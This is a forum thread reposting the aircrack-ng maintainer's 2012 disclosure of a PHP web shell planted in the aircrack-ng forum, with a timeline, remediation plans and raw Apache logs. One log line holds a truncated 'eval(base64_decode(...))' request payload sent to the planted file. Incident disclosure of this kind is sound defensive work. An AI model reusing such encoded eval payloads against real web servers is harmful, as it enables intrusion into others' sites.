Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 30-05-2012 03:23:27

[email protected] (Mister_X)
Invité

Re : [Aircrack-ng] Forum virus details

Hi,

as you know, I shut down the server a few days ago because I was told there was a virus. Here is what I know about it so far. This post will be updated as I know more. There is a summary at the end of this post which will be useful for your IT department.

The virus is also known by Sophos as Mal/Iframe-W and it was uploaded in the forum in a separate directory inside the forum, 'data'. It's a piece of PHP called rbvzv.php (1418 bytes) that has a payload encoded in base64. Then it is passed to the JavaScript function eval() which is going to execute it.
If any of you guys is interested in the piece of code, let me know, I can send you a copy; I'd love to know what it does but unfortunately I don't have the knowledge yet to decode it. I can read Javascript but the problem is that it's not plain Base64.

I checked the whole server and the attacker got in through the web server, no login and apache didn't have any privileges (user without bash, etc).

For those who are interested, here is the raw apache log from the attack:
91.224.160.132 - - [23/May/2012:01:12:04 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 15 "http://forum.aircrack-ng.org/phpmyadmin/index.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; Media Center PC 6.0; InfoPath.2; MS-RTC LM 8)"
190.102.136.196 - - [23/May/2012:20:22:43 +0200] "POST /data/rbvzv.php HTTP/1.0" 200 727 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MAAR; .NET4.0C; .NET4.0E; AskTbPTV2/5.9.1.14019)"
81.30.222.42 - - [23/May/2012:20:23:26 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 1212 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MAAR; .NET4.0C; .NET4.0E; AskTbPTV2/5.9.1.14019)"
116.55.19.96 - - [23/May/2012:20:24:50 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 1212 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MAAR; .NET4.0C; .NET4.0E; AskTbPTV2/5.9.1.14019)"
61.50.171.2 - - [23/May/2012:20:28:15 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 1270 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MAAR; .NET4.0C; .NET4.0E; AskTbPTV2/5.9.1.14019)"
178.218.224.2 - - [23/May/2012:20:27:01 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 1270 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MAAR; .NET4.0C; .NET4.0E; AskTbPTV2/5.9.1.14019)"
200.222.109.146 - - [24/May/2012:07:48:55 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 19 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:5.0) Gecko/20110619 Firefox/5.0"
200.223.136.254 - - [24/May/2012:11:50:31 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 19 "-" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322)"
210.101.131.232 - - [24/May/2012:15:49:50 +0200] "POST /data/rbvzv.php??asc=eval(base64_decode(%27ZXJyb3JfcmVwb3J0aW5nKC0xKTtzZXRfdGltZV9saW1pdCgxODAwKTtpZ25vcmVfdXNlcl9hYm9ydCgxKTsNCiRwYXRocyA9ICcvdm HTTP/1.1" 200 19 "-" "Chrome/15.0.860.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/15.0.860.0"

As you can see, the file was created by that first guy, 91.224.160.132 and the timestamp (creation and last modification) of the file confirms it:
-rw-r--r--  1 USER GROUP 1418 2012-05-23 01:12 rbvzv.php

Unfortunately, I don't think I can do against those guys, a whois on that IP address looks like it's a shady business (Bergdorf Group Ltd): IP in the Netherlands but the person to contact lives in the Virgin Islands. Anyway, I sent them an email address and we'll see if they answer.

As far as I know, it is limited to the forum and nothing else. The attacker didn't get on the server or installed any backdoor.

So here is what I'm gonna do next: I'll check the forum database to see if they tried anything else against the forum (and check the apache logs to see if there is any other mention of those IP addresses). I want to know how it happened exactly and when.
The forum is probably going to stay down for another week, I want to migrate it to another server and I need to make sure everything works properly and the new DNS are propagated.


So, to summarize: it happened a day before I got the email letting me know there is a virus. It happened May 22 at 23h12 (11.12pm) and I stopped it on May 24, around 14h00 (2pm).
I don't remember noticing anything special when browsing the forum between those dates (I'm not sure if I browsed it on those dates). In case you experienced anything, let me know. I'm really sorry about it.7538555703405721380-6690923412329015043?l=aircrack-ng.blogspot.com

http://aircrack-ng.blogspot.com/2012/05 … tails.html

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 30-05-2012 04:42:51

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell
Inscription : 13-12-2010
Messages : 783

Re : [Aircrack-ng] Forum virus details

C’était donc bien une attaque.

forum et dépôts svn de aircrack-ng out! sad

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
aircrack-ng par baltigor
2 105 30-11-2016 20:46:48 par koala
Aircrack Clé WPA incorrect !!! par Youbix  [ 1 2 ]
25 847 12-08-2016 11:53:18 par Seska
Renommer le forum par Seska  [ 1 2 ]
42 1176 31-07-2016 18:07:46 par kcdtv
Failed Aircrack-ng par regard48  [ 1 2 ]
30 1039 13-07-2016 20:42:42 par Fab955
19 956 11-07-2016 17:52:50 par kcdtv

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.024 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]